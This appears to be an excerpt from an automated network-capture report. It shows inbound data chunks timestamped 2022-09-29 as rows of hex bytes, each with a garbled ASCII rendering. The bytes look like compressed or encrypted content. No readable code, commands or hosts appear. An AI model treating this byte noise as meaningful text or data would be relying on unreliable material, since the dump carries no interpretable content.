                                                                                                                                                    2022-09-29 12:59:23 UTC33878INData Raw: 7b 60 6f 66 32 55 fd cb 1d fc 4d 34 ca 7b ef 00 6f 44 1b 1c 33 cc 66 41 5e 2e ca 77 17 ed e4 ef 8d 07 15 0a c1 c1 06 20 41 ee c3 e9 40 a8 db d0 18 05 67 b1 49 fb 4b e6 85 68 88 f3 31 2a 0b 42 2b ee 98 bb a3 7f 81 06 fe af a0 12 fc 78 06 6a 27 ce 8f 9f 3b 3d fc 66 00 1e 76 cd 8b 0c 75 66 a6 d6 84 c1 0b 64 11 44 96 86 0e f1 59 5a 5e 3d 57 76 e1 a5 7e c8 f2 6b 37 39 bb 39 a3 c4 70 20 fd f3 c0 50 ac 5b d6 27 ad f7 03 b9 bd 90 30 49 3c 8d ed 09 ec dc 23 84 a7 1a a4 ee f4 50 a6 cd b0 77 13 95 22 49 b6 7e 3f ad fb 31 89 96 c8 3d 5c 14 17 24 e9 df 1f 16 73 bc ea b1 c9 b9 98 3b 62 f8 95 eb 77 80 82 25 b9 8f 3f 07 87 3e a2 65 bd 6e ce 4f 31 cf 6b 26 90 b3 3b de ec 1b 1a 58 6c 4d 72 7d b1 5b e0 4b cb 65 fd 72 44 a8 84 ee 85 21 b3 9a df 26 b6 70 a0 a9 ea 78 57 01 93
                                                                                                                                                    Data Ascii: {`of2UM4{oD3fA^.w A@gIKh1*B+xj';=fvufdDYZ^=Wv~k799p P['0I<#Pw"I~?1=\$s;bw%?>enO1k&;XlMr}[KerD!&pxW
                                                                                                                                                    2022-09-29 12:59:23 UTC33894INData Raw: 6c 4c 28 e1 bc 9c 03 c2 07 32 b0 66 bc b7 ba 77 c0 d3 cd 42 a0 0e 29 fc 09 d7 ce 75 de 2f b3 4b b1 4a 1a 97 6b 62 be dc 7c 04 65 d8 af d4 85 df 86 28 71 c9 3c e6 cd 58 1f 78 81 77 7a 21 33 11 40 38 5e d3 18 44 3c d5 89 1c a3 f7 c6 8f 2a 58 97 25 5b aa 32 60 a4 8f bc 21 4f 95 f2 72 58 85 32 41 d0 7e 93 ee 91 ca bd ab 61 10 53 9f 00 ab 65 dc fe 6f 25 62 5a 59 f2 f5 02 d0 d2 aa 5d a8 78 05 4b ed 1f 3d da 86 d2 cb a8 61 94 24 ab 90 f4 78 7d 84 db 4f b2 a0 e8 c9 25 e7 e8 4a ae cd 49 39 07 3e f0 39 c2 2b 11 e7 cb 29 0a 25 8b 31 ae 26 07 39 68 69 3d e6 31 db 6a 9b f6 ba 2c dc f8 1b ea 07 dc ea 10 61 0c c1 e3 76 a2 04 18 3b 64 c1 b1 73 a8 3b 67 a8 46 5f 61 4a 3a 49 14 2c 4e f8 9b 4e b7 95 e7 13 f1 f2 94 e5 5e 90 64 4d 56 8c de 61 58 ab 19 c7 01 50 f8 27 24 d2 2e
                                                                                                                                                    Data Ascii: lL(2fwB)u/KJkb|e(q<Xxwz!3@8^D<*X%[2`!OrX2A~aSeo%bZY]xK=a$x}O%JI9>9+)%1&9hi=1j,av;ds;gF_aJ:I,NN^dMVaXP'$.
                                                                                                                                                    2022-09-29 12:59:23 UTC33910INData Raw: 67 17 24 3c 43 b7 41 bc 5b 1e 1f 82 e1 64 3a 2b 3e a2 3d 43 b9 fd c1 14 4f 2d 84 25 17 9d 47 55 38 91 eb 71 de 2d a5 3b cc 29 ab ed 88 06 9d 1f 06 87 46 85 5b 93 70 78 32 9a ef 17 21 e7 f2 eb a5 d0 05 4f 96 6a 2a 61 6d 75 e9 df 6d 92 10 04 e3 f6 cf 52 c8 b0 10 be b0 39 75 0a ec a1 ac 4c 2b ed be 66 18 04 bc fb 9f 7d 79 8f 85 1d 90 2b 73 41 4c 88 40 99 f5 40 35 98 d8 4b 45 d1 30 d4 9f 4e 33 a6 91 e7 04 90 04 54 ab 30 a0 35 79 62 e9 32 19 82 c7 1f 59 0b 53 52 2e db 0d c5 15 6b 3e 04 3a 59 5c 2e 3a a9 87 5f 5b f4 49 8d dc e7 68 b4 44 22 e7 d8 2a 07 9c a6 ca 72 fa 44 f2 6d de fa 47 ed 43 8a 23 d4 5a 5f e7 e9 48 c4 65 75 86 e2 bb 42 b6 8c 36 0b 9a 6b bb 23 b2 6f 90 1e 5b ae 6f 0d 92 a5 c8 b8 f2 a7 62 16 99 c1 1e f7 d9 b0 7c 46 11 29 91 ca 31 97 70 fc 17 c8 91
                                                                                                                                                    Data Ascii: g$<CA[d:+>=CO-%GU8q-;)F[px2!Oj*amumR9uL+f}y+sAL@@5KE0N3T05yb2YSR.k>:Y\.:_[IhD"*rDmGC#Z_HeuB6k#o[ob|F)1p
                                                                                                                                                    2022-09-29 12:59:23 UTC33926INData Raw: f9 96 59 68 27 2c 1e 1c a5 26 d1 fd 14 7b 34 70 db 53 d1 c1 6c 3f 79 68 a1 9d 07 6d 7f 0a 99 f8 c6 c3 d5 e8 cf c0 14 c5 8d b6 ac 29 e1 07 27 99 ce e8 4b 42 6b c3 b3 ad ee 11 ef c8 b6 cc d2 22 74 6c 0a 2d d7 14 4b 83 28 43 b0 a9 00 88 72 76 f7 98 4c af ee 4f 8c 14 e6 47 23 af c7 da 85 ce 71 ab ff 1b 63 f8 23 4f be 46 76 16 6e 08 4b 71 6a f2 bc 5b b1 b7 02 be 04 b8 21 61 5e 0f 24 2b bf 5e 19 bc 68 23 87 74 36 72 52 d3 1f 5c 43 96 c2 b4 26 15 46 e5 c3 1c f8 d0 1a f6 c4 b4 06 dc 92 d9 9d 53 d4 f6 22 6d 95 50 b2 c2 a0 b8 5a b0 c7 88 c7 0f 44 ce f4 5d 2d 40 64 52 75 4c 11 0c b6 23 c5 a7 de 92 10 42 74 9b 41 d6 9d ea f2 c0 de c5 a8 08 7d e3 76 a9 b4 2f 7b 65 f2 4f 93 8f dc d4 f8 6d 32 d9 85 73 24 c1 14 58 7e e0 3c 91 80 71 57 2c ec 1f 1c 03 12 e5 31 0b 6b c9 22
                                                                                                                                                    Data Ascii: Yh',&{4pSl?yhm)'KBk"tl-K(CrvLOG#qc#OFvnKqj[!a^$+^h#t6rR\C&FS"mPZD]-@dRuL#BtA}v/{eOm2s$X~<qW,1k"
                                                                                                                                                    2022-09-29 12:59:23 UTC33942INData Raw: f7 75 3d a1 b5 cd 53 9e ac b1 24 45 0a 08 d3 9d d4 11 9e 1a b3 71 97 58 f2 74 1e ec c3 82 46 ed 11 4c 93 df cc 9c 60 77 eb b0 3f 4e 40 30 9b 6c 19 da b5 12 de ec c9 75 93 94 74 54 76 ed 50 65 e5 fc c8 1d 87 06 d0 10 d9 b6 6a 1a f1 19 db fb 8a 58 f0 ec 37 9b 20 7f 48 47 0e 43 39 d6 6d 09 cb 26 d2 a5 71 1d 91 31 d3 a3 58 8a ba af 0d 16 cc 00 0e 9c 58 87 16 2a 1a 0f d1 31 65 47 ba b4 e7 b4 6a b3 64 0c 74 43 b0 30 f5 68 8a 9f 32 b7 26 24 77 fd d5 4e a1 fe 34 a9 0f 34 bf 41 df a7 3a ba 98 5e eb 17 ef 0e a3 6d c9 8a 60 bf 8e 85 90 91 cb 0b c5 32 a6 54 68 91 0b ab 2f 61 cc 39 87 94 d9 6f da f8 5d f4 0e 7c 3d ae 8c 58 90 01 9c cb cb 04 a0 e6 84 21 52 8b 09 77 3a 6b cf 2a c2 e9 d1 eb b1 91 02 24 8b e8 af ec a2 3d 1c b2 49 e6 3e b4 1c f2 58 f6 d7 ae a1 f1 e3 12 4a
                                                                                                                                                    Data Ascii: u=S$EqXtFL`w?N@0lutTvPejX7 HGC9m&q1XX*1eGjdtC0h2&$wN44A:^m`2Th/a9o]|=X!Rw:k*$=I>XJ
                                                                                                                                                    2022-09-29 12:59:23 UTC33958INData Raw: 41 f9 54 f4 b1 52 e4 5b 51 1e 91 f0 59 fa bc 8c ec ee 91 73 d8 a0 08 66 1f ab ef 54 ad 02 79 9d bf f9 a3 0b d8 25 87 ec 02 f4 72 d5 25 e1 b2 21 93 94 4e df f0 f5 ae c1 2f cb 75 da 9d 4f 49 0b b0 a7 94 8e 49 b7 b0 d1 45 0a 9f d9 56 e9 00 bc cb 41 a9 44 94 8e cf ab 65 1e 38 71 27 c0 c4 b3 95 d3 39 8f 7c b1 60 40 b0 85 de 31 01 b1 fa b6 5e 15 6e ff 3b b8 20 18 5e c9 33 b4 95 de c8 8d 1e c0 a4 5f 49 a2 33 41 fd 4e 0c 0f 56 0b 9c eb 9a 45 3b 25 13 89 e4 a1 c3 91 40 30 13 67 15 a0 38 e7 30 f6 1b 69 29 df 84 79 dc 90 3d 30 51 f1 7c 56 d4 bd ca 3c f6 ad 1e 40 6f 17 06 39 28 79 02 d3 99 7b 93 ce fe ee b7 12 21 73 73 29 ea fc 30 dd 24 41 3b 2f 46 a7 b9 be f8 fc be aa 2c 3b 10 c6 10 6a 12 b5 ac 29 90 83 0c f8 56 84 67 67 6d 60 03 26 e3 2d 77 e0 f0 11 bb aa 66 15 22
                                                                                                                                                    Data Ascii: ATR[QYsfTy%r%!N/uOIIEVADe8q'9|`@1^n; ^3_I3ANVE;%@0g80i)y=0Q|V<@o9(y{!ss)0$A;/F,;j)Vggm`&-wf"
                                                                                                                                                    2022-09-29 12:59:23 UTC33974INData Raw: 1f 6f 3b de 43 04 6d e9 f2 dc 4d 76 ac ac 0f 84 19 01 cf d1 f2 af f8 4c f6 97 70 25 2a 12 4d bd e4 e6 c9 48 03 7b 21 0a f5 b4 af 52 9f e6 34 2e 9d d9 92 a3 2b d5 86 94 67 4d b1 4a 23 26 c6 d1 3e ff 6c fc 76 9b f2 3a 2e e7 d0 e1 e7 4c 9f fe 4a 0a 20 a8 25 0d 69 8c 14 3a 73 11 15 77 45 b8 e0 75 c0 af bf 48 61 a8 24 ea ac 07 6c e1 3e 9c 52 d6 e7 43 d2 82 38 c1 0a f4 8c d3 66 68 3c 4f e5 2b 08 40 10 f7 84 3b e9 e1 75 b5 da 08 06 a0 a5 9b 3c e4 39 57 43 48 7a 82 f6 c3 bb 9e 42 95 36 78 81 d6 00 9f 6b 0c 31 e9 4d 76 55 a2 fc 91 11 01 bc 49 fb fd e9 53 94 0d 6a e0 bf 13 73 32 ba 75 af 11 37 1e 77 00 fe 26 f2 97 f3 9e 37 66 d4 01 54 17 69 e3 f5 26 76 e0 67 46 0d cd 52 16 6d d2 22 c8 91 3d 18 97 22 8b c9 8f 66 d0 91 de 73 af b0 9a 0a b0 35 77 1b cc e6 32 41 6d 88
                                                                                                                                                    Data Ascii: o;CmMvLp%*MH{!R4.+gMJ#&>lv:.LJ %i:swEuHa$l>RC8fh<O+@;u<9WCHzB6xk1MvUISjs2u7w&7fTi&vgFRm"="fs5w2Am
                                                                                                                                                    2022-09-29 12:59:23 UTC33990INData Raw: 84 26 41 21 f6 56 6f f2 7e 33 b9 47 6d c1 56 20 e2 f8 05 9c e9 7f 25 7d 04 a0 2e 4d 04 52 fa 95 a7 66 2c 32 ff 5b 29 dd dc 47 0d cd e7 c3 8e e6 0a 39 40 09 6a b3 b8 b9 a5 8c 2d 81 a1 4e 73 9e 58 f0 fe f9 43 ad ed 34 8c 8a f3 7a af a8 1c e3 9e 26 b0 fd e5 1f a2 78 6f fe f2 45 6a b4 84 6a 4d a5 6c 7a b1 cf 52 c0 a7 5c 39 62 26 ec 03 f9 a5 58 39 bf bd ae 48 8b dc 7a 62 48 01 4e 8c 7e 69 47 b2 6c b5 e2 9f 61 53 22 fb 67 fe 02 32 c5 93 75 f3 bb dc 5e 7b bf ed 67 16 7c be 1a a6 f6 cb d6 65 08 1d d6 97 46 03 61 e7 08 89 36 c4 3a ba 81 77 0a 45 7f 4d 33 d9 43 36 50 17 ae f3 06 fe 48 c5 c2 df 8b 68 64 c8 70 19 15 4e dc e2 5b 47 f6 a5 1a c2 20 25 1c b0 4d 42 b3 47 4d f8 67 d0 59 95 aa 39 57 a2 d1 d7 19 2a 4b 59 d9 a5 f3 dc 12 71 10 0f ea 30 ce 62 7e e9 38 8e 1e c8
                                                                                                                                                    Data Ascii: &A!Vo~3GmV %}.MRf,2[)G9@j-NsXC4z&xoEjjMlzR\9b&X9HzbHN~iGlaS"g2u^{g|eFa6:wEM3C6PHhdpN[G %MBGMgY9W*KYq0b~8
                                                                                                                                                    2022-09-29 12:59:23 UTC34006INData Raw: e9 e1 9e 57 6b 46 72 1c 2f 86 5e e5 de 4f d5 10 e0 70 91 31 8d 5c 4b b0 1a 84 34 5b d5 d4 72 16 78 db f9 17 71 56 e2 e4 21 78 53 75 a0 c9 44 68 f1 ae f6 3d d2 c9 c4 d7 c5 18 f9 05 09 39 15 24 c2 29 50 46 cf a7 08 5c 99 0e f5 cc 06 96 56 b7 ed 5a 08 57 aa 20 1a dc 0d cb ad b6 72 66 f7 a8 ab 3a e9 05 11 58 fc 50 34 3d 9f 2a 6c f0 60 8c 67 47 c6 0f a6 2e 56 06 76 dd e6 4c 96 4d 24 86 a5 8c 41 47 9c 7e 79 bd b1 71 f9 93 d8 a0 d0 68 78 fb 4d 7f f1 de 66 8c 2f bf 1f f7 74 ce d6 74 8d 68 e8 1a 35 f9 bb ee 90 b5 ab dc 49 bb ae 11 26 28 03 bb e2 de 5c d1 1d 4c fb 9e 96 ef d3 66 f6 25 50 d2 21 65 78 f9 de ed 72 57 92 92 83 3d 36 66 77 94 53 83 6d b6 9e de 32 79 63 73 b9 98 12 44 7b ab a2 03 a9 03 5a a1 86 47 1c 6c 8a 07 bd c5 9c df 82 c5 f4 a0 bb f4 e4 a6 46 00 11
                                                                                                                                                    Data Ascii: WkFr/^Op1\K4[rxqV!xSuDh=9$)PF\VZW rf:XP4=*l`gG.VvLM$AG~yqhxMf/tth5I&(\Lf%P!exrW=6fwSm2ycsD{ZGlF
                                                                                                                                                    2022-09-29 12:59:23 UTC34022INData Raw: 85 24 49 10 df 69 34 06 eb 2d 57 83 85 4d 85 bf 38 c5 16 ed b7 62 f5 9b df 72 1c ca 2f a7 92 a6 17 8b 05 28 59 e1 ca 08 0a ed 59 1b 8d 52 6e 7d a0 70 cd 7a 23 bf 3e ac f6 ba 0f 1b 88 61 0e c1 fd 7b 31 76 38 52 a3 00 66 57 68 fc 2c 62 69 ba a3 94 e1 d1 95 f9 7c f1 61 6f 6f f1 e5 1d 72 8e 47 15 ab 19 d2 1f 52 af e4 e3 f5 80 79 bd 0c 58 4d 3d be c0 8a f2 e4 d2 dc e0 9f 91 d0 ef 95 14 cf 41 2d 7b 08 26 88 08 82 91 2a 44 ca 19 5a 3d 2d f5 e1 ff 6f dc 1b ec 3a 93 0e 9b e4 37 f9 7a e9 66 42 fe 27 66 a0 2e 19 b4 f3 ae c9 8d 68 cc c6 ad 13 ba bf 96 b0 4f 94 a1 56 dd bd ea 2b e9 1e 16 a8 c4 d5 c5 4a e0 91 13 0b 06 85 57 ae 0b a6 55 e5 f5 a2 0a f5 f0 11 f7 db 10 1c b7 8a c4 d2 5b ab 40 7f f8 f8 a4 5a 19 73 53 17 dc a1 26 9c cf b5 d9 65 7a a7 67 56 78 8c e3 a7 76 54
                                                                                                                                                    Data Ascii: $Ii4-WM8br/(YYRn}pz#>a{1v8RfWh,bi|aoorGRyXM=A-{&*DZ=-o:7zfB'f.hOV+JWU[@ZsS&ezgVxvT
                                                                                                                                                    2022-09-29 12:59:23 UTC34032INData Raw: e7 39 48 11 10 29 b7 a1 1a c0 8a d8 d8 e5 f6 bf c9 9d a9 83 2c 26 b5 0c 26 d9 ec d3 5e cb cc f5 fe 3d 59 67 55 e0 2c cd 2d 44 c3 25 b7 e5 72 6c 7d df 63 f2 bf 17 7e 86 7b 2d 54 d0 6e f1 bc 62 2f 76 f4 84 61 a2 0f bf b8 cb 45 b7 c0 de 75 27 e4 79 ae fd 06 9e 1d 87 54 24 26 a5 0b 33 7b 47 3c 2a 02 8a 63 be 38 45 bc 6b 82 6c 36 c8 64 a3 09 71 72 67 81 91 ea 02 c4 b0 67 8d 9b 60 80 f7 30 e1 99 89 b3 da 03 b4 6e db 32 08 da 2a 38 a6 cd 3a a7 f1 ee ad 62 a4 ab 6f ca 27 4e 7f 11 0c 6b 17 09 47 0c 02 a3 06 00 ed d6 d1 9a 14 a2 c2 c0 7c 8a 11 a1 c3 6c 36 36 b9 17 98 e2 e0 6b 5c 47 7d a3 b9 61 fe 4f f8 f4 fb fd 1c 3c bb 6c ed ff 1f fe 8a 18 6e 4f c6 2e 42 c5 d0 bc e1 d3 37 4e 11 e6 d7 de 94 b5 96 bb da 29 d4 c6 0a a0 fc 78 3e 5c 92 8a d5 a3 54 c7 87 30 1a 0b 3e f2
                                                                                                                                                    Data Ascii: 9H),&&^=YgU,-D%rl}c~{-Tnb/vaEu'yT$&3{G<*c8Ekl6dqrgg`0n2*8:bo'NkG|l66k\G}aO<lnO.B7N)x>\T0>
                                                                                                                                                    2022-09-29 12:59:23 UTC34048INData Raw: 47 a9 f9 4f 82 1c 63 91 ab 36 d9 c2 6d 99 f3 39 55 1d 96 de 97 91 94 85 66 38 5e d8 27 15 c4 46 12 4c 05 aa 0d 45 67 5f 1b cd 1b ba 0b 26 66 11 1d 98 29 43 9c 67 64 d0 d9 53 6b 0c fe 09 f3 64 49 85 3d 6d 56 47 48 4c a7 06 9e 1a 5c df eb a2 3f 3d e1 c2 1e a7 0f e1 9f 38 e0 93 7f 7a ad 21 49 e1 44 6d af 84 6c 0f a6 12 dc 79 7b 4f 23 e9 7c dc 33 1b 8e e6 ac 23 17 e2 e9 6d 26 49 3c 31 0a bb e6 dc f4 2a e8 a4 bc 11 24 23 6a bd 0b 6f 70 a3 c8 73 f2 82 c2 14 23 c0 6a 84 10 11 c0 1a 7b 41 73 3d 56 ab 75 b9 0b 46 12 99 72 4f b1 90 7c 0c 7a 2c 46 7e 3a e5 5a bb 30 c4 04 bf cc 22 ae c9 41 1c ac d5 3e c3 0d de 0b 84 e3 9d f3 e4 7d 6f 91 90 f3 5f c8 4b 52 51 5c fb 7b 39 3a fe 83 aa 75 0e 95 6a 15 f4 18 cb ec d9 9e 0f 16 5c ab 48 65 5d 53 08 01 fe 99 3e 59 0e df a3 f5
                                                                                                                                                    Data Ascii: GOc6m9Uf8^'FLEg_&f)CgdSkdI=mVGHL\?=8z!IDmly{O#|3#m&I<1*$#jops#j{As=VuFrO|z,F~:Z0"A>}o_KRQ\{9:uj\He]S>Y
                                                                                                                                                    2022-09-29 12:59:23 UTC34064INData Raw: 3a cb e6 b1 0e 87 68 5a 65 d8 0d 10 7f 68 8a 1e 1e 11 ae 08 10 0d dc 6e e7 3b 3c 54 2f 62 f0 57 13 e0 fe 34 82 53 81 d1 76 4b a3 23 d1 bd 8a 03 36 5f a9 78 5a 6f 5d 71 c4 70 d7 dc e6 e4 c5 13 15 8e a9 2b db 1d 23 bc aa f4 54 0a af 11 57 f4 f9 b1 54 3e 3e 31 92 b3 c3 69 55 70 73 9f 95 80 a5 70 a9 6d ec 0f b3 b8 51 41 7a 67 02 6f af 3f d0 ed 70 e3 14 60 06 66 91 53 0c 42 eb e8 50 6c a2 11 be 45 15 35 a2 25 45 2d 4c ef db fb 5c 8c 22 be 5d d8 9a c9 4b 42 6b 7f d5 23 30 5b 5f 42 e2 2c 2b dd 41 f6 71 0f 65 8a 32 9e 74 3f f0 de 88 09 5c f7 c1 26 ad 16 2a aa 94 7e 78 4c b2 2d 15 20 6e e5 36 6d eb 19 9d e9 d7 b7 a3 b3 94 e6 54 d5 ae ab 03 52 87 bc 06 e9 a8 6b 12 61 24 75 11 de 1f 8a ac 3e 96 70 80 de a7 bd 57 e0 7b f1 ba ce 43 40 6d 26 88 7d bc af 1a 61 f1 6e 17
                                                                                                                                                    Data Ascii: :hZehn;<T/bW4SvK#6_xZo]qp+#TWT>>1iUpspmQAzgo?p`fSBPlE5%E-L\"]KBk#0[_B,+Aqe2t?\&*~xL- n6mTRka$u>pW{C@m&}an
                                                                                                                                                    2022-09-29 12:59:23 UTC34080INData Raw: 8b c5 52 e2 8c f0 0b 5e 9a 1f 07 84 ae f7 59 c2 d9 4a 43 69 8f 01 a1 e8 69 9a 41 9d c7 d7 1f e7 f3 5f 8b dd 1c a5 c6 31 6f b0 cc 44 3a 78 c4 02 bc 48 aa 21 8b b7 8c fe c4 21 16 f0 70 50 e5 eb 4d b8 0d b0 77 40 23 91 46 56 30 ef f8 f8 56 a4 a0 26 0e 9b e9 bc 2b a9 3a 2f 59 d3 33 77 d4 87 10 0d 31 53 92 f2 bd 2e 70 39 a3 34 c6 50 7e eb 13 62 a1 db 16 d2 f0 03 0b c2 6b 18 01 d5 e2 60 9d f6 75 5a 14 58 c3 86 ae 90 4e ab d7 a8 77 bb 26 05 55 f3 64 1d 5a 8e d8 15 83 27 e0 ad 06 d1 e3 54 b0 f2 54 1b 29 4b 98 61 c3 f9 ad 9c 37 47 66 4c ee ca 09 44 77 8a 48 e3 41 85 4a c0 f2 75 0f 7a 5b 27 e6 a9 99 16 2d 67 8a 3d 2d 4f 9f 10 e0 79 dd 39 1a de ef f3 5e 79 33 f4 35 e4 ab 9b c6 48 fc 16 1b 0a 83 35 93 ff df 9d 9b 4c 18 0f bc 51 72 3c e3 b8 08 6c 1f ab 99 d4 ee 33 76
                                                                                                                                                    Data Ascii: R^YJCiiA_1oD:xH!!pPMw@#FV0V&+:/Y3w1S.p94P~bk`uZXNw&UdZ'TT)Ka7GfLDwHAJuz['-g=-Oy9^y35H5LQr<l3v
                                                                                                                                                    2022-09-29 12:59:23 UTC34096INData Raw: 1d b1 c8 b7 24 03 28 da e2 f6 ac c0 38 27 64 7a 3a 76 08 c3 a2 c4 b5 c7 44 19 35 c4 61 01 a2 28 cb 00 16 c0 d9 e3 8b 52 49 24 66 77 fe b1 2b 65 43 c7 06 93 5e 32 6c ea 7d bd 89 9a 8e 4a d5 8e d2 03 7b 69 9b 5a d7 19 7f 79 c3 f1 21 31 38 a5 76 c8 10 38 9b bd 4f a9 dc e6 96 0d 88 32 b0 f3 4c 1c 02 ee e1 39 0a d4 24 e5 83 94 0d a1 c3 ab 89 68 81 7d 5b a1 1b 23 72 23 12 53 92 60 63 59 10 38 3a 7b 30 90 93 d2 59 83 67 5f 36 bc a4 6c 26 17 32 8d a2 38 1d 89 21 e5 66 f5 fa 6f 75 80 b5 e9 c9 61 53 cb af c6 11 ec d1 e6 3c 2b cd 0c 33 28 5a 5e 75 2a b0 4f 32 01 f5 e0 2b 14 77 ca a8 69 6d 0e 73 88 e0 58 74 ae 39 c4 c4 b9 b0 d7 b4 a8 5f 09 66 41 55 34 96 a0 89 72 8c be 93 10 c8 5e c4 76 9a 5f cb 11 06 72 3f 3e 1a 6e 96 42 9e 3b 42 d8 7e 1b 4f d8 9e 92 24 1c e1 5d e7
                                                                                                                                                    Data Ascii: $(8'dz:vD5a(RI$fw+eC^2l}J{iZy!18v8O2L9$h}[#r#S`cY8:{0Yg_6l&28!fouaS<+3(Z^u*O2+wimsXt9_fAU4r^v_r?>nB;B~O$]
                                                                                                                                                    2022-09-29 12:59:23 UTC34112INData Raw: 95 2b e8 f6 2e 9b 48 ad a4 92 08 55 67 ee 00 4c 50 b7 dd 8d 38 be 5b 9f 98 5b e7 91 c0 64 82 55 26 16 28 b4 da c0 89 0d 2b a9 73 7c 18 07 f4 9c 28 b1 e9 e3 6b 48 c3 70 5f 15 83 11 49 2e 1e 44 4d 20 56 bd df 54 ad 8f 58 4c fa c5 10 85 a3 ba 66 07 71 6e ea 36 3d cf 83 b5 1f 54 47 ac 8d 43 05 b5 3c 5c 00 1e 68 e5 9b bd 26 87 70 20 90 31 1f 49 5f 19 de 81 3e ac 5c 75 b4 da 27 0e 6e 4b 67 40 11 cf a4 53 c2 e0 9c 7e 51 71 c8 b9 6f b6 d3 ab 27 5d 50 0f 92 bf 3b 52 c6 8f b4 88 6d 19 1a 65 18 0a cc ee da 73 ed 1d 4d 46 51 44 43 5c 2b 82 08 62 48 90 0c 24 8b 19 a8 af a5 36 d3 92 d3 de cf 0b 42 e8 9e 9a d6 33 8b 5c 4c 28 07 4f 29 c4 09 15 40 bf c4 3d e3 61 de 38 85 72 9f 52 b1 6c e0 2d 51 3f 3a 6c c3 32 2f 9a 05 60 79 09 d4 0f 09 59 c0 48 b3 45 d1 76 63 ed c9 de b3
                                                                                                                                                    Data Ascii: +.HUgLP8[[dU&(+s|(kHp_I.DM VTXLfqn6=TGC<\h&p 1I_>\u'nKg@S~Qqo']P;RmesMFQDC\+bH$6B3\L(O)@=a8rRl-Q?:l2/`yYHEvc
                                                                                                                                                    2022-09-29 12:59:23 UTC34128INData Raw: d8 84 fa 0b 20 dd 7b 73 4e c9 11 06 51 a2 04 e9 24 d2 20 05 31 e8 cc 7a 45 77 85 c7 80 c4 c9 5f e5 b2 d0 d1 c1 8e c9 e7 c3 0c 7d 48 a1 af 95 bb be 65 fc 41 42 6d 42 6e 32 72 b1 a4 0c 2a 8f 44 76 ab 28 ec c2 53 6d e4 77 de 3e de a7 51 ed c2 44 3b 3f eb b7 cb d9 6a 7c d1 16 a5 5d 80 48 7b 99 dd ff 08 1e 0a 41 85 24 09 86 5f e9 9a 96 e4 07 d6 ad de 95 57 34 e9 46 bc d3 5d 0d 2e 6f 22 3e 7c 5d 05 82 e7 20 84 b4 9d 83 e6 95 e5 a9 8b 7a ca 5d 78 06 5b d8 f7 b3 f3 f6 f3 8d 44 50 86 53 c7 e7 6f 2f 62 17 31 0d 11 a4 e0 1b 4d 60 ed 05 dc 6b 13 6f 6b 7d c0 dc 81 d8 29 8c c9 86 b1 cd 78 aa 66 e7 5e a2 9b 4f d1 8d 15 2f 96 f6 4b e9 65 58 2f 85 16 96 d6 9a b4 94 66 a0 2d 49 c3 a1 98 b2 d7 7e 02 e3 32 73 24 d9 5c db 6b 77 68 45 a3 4a dc d2 50 f0 22 1b b8 7f 57 09 c6 65
                                                                                                                                                    Data Ascii: {sNQ$ 1zEw_}HeABmBn2r*Dv(Smw>QD;?j|]H{A$_W4F].o">|] z]x[DPSo/b1M`kok})xf^O/KeX/f-I~2s$\kwhEJP"We
                                                                                                                                                    2022-09-29 12:59:23 UTC34144INData Raw: 40 6c e8 4b 78 e9 eb 47 c6 6a 21 99 b1 1f 59 2c 4c d4 90 7b 77 0e 6a d1 61 95 a8 81 5d a7 d3 03 77 70 ee 25 50 c5 b9 69 9a 8d 2c 39 e4 34 23 f3 31 9c 6f 2e c3 0f 6b 6c 98 fd 13 27 9d 16 c1 22 8f e2 5c 75 be b3 98 e7 52 d4 41 02 7d 75 bd c3 71 2c 10 fa 43 e6 89 da d8 d8 da 01 c6 07 cc 12 17 b0 7e 48 42 ee fa bd 8a e4 9e 34 a2 6f 7a 50 7d 67 6e d1 a8 2f 38 8e 4d 5f e2 c4 63 fd 10 b9 4c 1d 0c ff cc dc 90 b0 6f b6 3e 89 13 11 19 76 5e 76 56 17 9f db 7f f5 46 65 15 84 66 e7 c1 b8 8a b9 0a 80 16 39 b1 a9 92 22 88 b3 b8 c1 09 94 a4 bf ba 18 08 10 e3 9f d8 7e b6 06 fc be b5 f3 be 0d 51 eb 2e 17 b0 b2 01 42 97 e4 8d 26 f1 e5 9a e1 c7 87 87 43 b6 fb 84 52 7e 8e d3 00 10 92 e0 e4 62 88 63 fa ff f1 6f 17 9f fd b5 b6 0e 2c 57 35 d3 11 4a 3f 3f 36 5b 6c e9 30 7e 22 18
                                                                                                                                                    Data Ascii: @lKxGj!Y,L{wja]wp%Pi,94#1o.kl'"\uRA}uq,C~HB4ozP}gn/8M_cLo>v^vVFef9"~Q.B&CR~bco,W5J??6[l0~"
                                                                                                                                                    2022-09-29 12:59:23 UTC34160INData Raw: 4c 16 52 2a cb 17 33 fb b3 dc ce ab 37 2b d6 36 c2 cc 05 de 9c 83 a3 23 dd 3c 6a d7 9d 18 3f 07 10 0f 8b 9e 74 4d af 52 1b f1 cb a2 0b e1 ac 71 50 72 5d 06 cf 47 e0 5e 5e 29 d9 78 b9 ff 48 e4 d0 b9 0e af d1 ab 70 15 30 f8 f6 b3 24 37 3c 45 4a 1d 15 b6 2f 60 43 d9 84 90 87 6f 5d 29 79 8f 84 b1 52 ba 91 99 a2 6d 2c 2b 46 45 73 cf 58 5b 53 1e e7 b4 4b 56 b1 44 6f 84 3b 30 de 24 54 8e cb 63 00 b8 a5 78 d5 9d 0c 71 33 51 e6 5c 80 6b 41 58 c6 c5 25 c5 ce a5 85 6a 7e c2 37 8c b6 b0 5f 54 eb 75 4b f7 4f 6b 5e 25 62 34 82 d1 22 bf bc 0d b5 71 8b 82 eb e8 74 8b 91 1e 8e f5 a1 97 be fd 39 b3 e9 15 b3 6f 05 86 5b cf fd 52 c1 69 9a 25 a8 99 18 b9 4c 11 28 a9 18 78 8f 5e 89 fc 41 5f b9 09 71 d9 45 68 09 98 93 6d 31 a0 0e e5 90 c2 29 c8 d1 21 ff 53 02 54 1f 35 b9 84 05
                                                                                                                                                    Data Ascii: LR*37+6#<j?tMRqPr]G^^)xHp0$7<EJ/`Co])yRm,+FEsX[SKVDo;0$Tcxq3Q\kAX%j~7_TuKOk^%b4"qt9o[Ri%L(x^A_qEhm1)!ST5
